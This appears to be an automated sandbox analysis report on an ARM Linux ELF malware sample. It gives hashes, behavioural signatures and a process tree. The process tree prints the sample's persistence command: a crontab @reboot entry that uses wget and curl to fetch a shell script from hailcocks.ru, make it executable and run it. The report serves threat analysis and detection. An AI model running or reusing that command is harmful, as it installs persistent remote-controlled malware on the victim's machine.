Analysis

  • max time kernel
    144s
  • max time network
    136s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27-10-2024 02:50

General

  • Target

    bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf

  • Size

    75KB

  • MD5

    87f114f7f6a5830d45ffe101ccd0de1c

  • SHA1

    1156d361e2050a882e4b224410682e116575588d

  • SHA256

    bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62

  • SHA512

    1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b

  • SSDEEP

    1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
    /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:644
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:645
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:648
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:649

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.ObcLt0

    Filesize

    306B

    MD5

    156ee72da2df4c852058bb0a4d6a1c57

    SHA1

    ddcde4860a652c8988f3cf45cb742ae199a5c4fa

    SHA256

    22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6

    SHA512

    94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64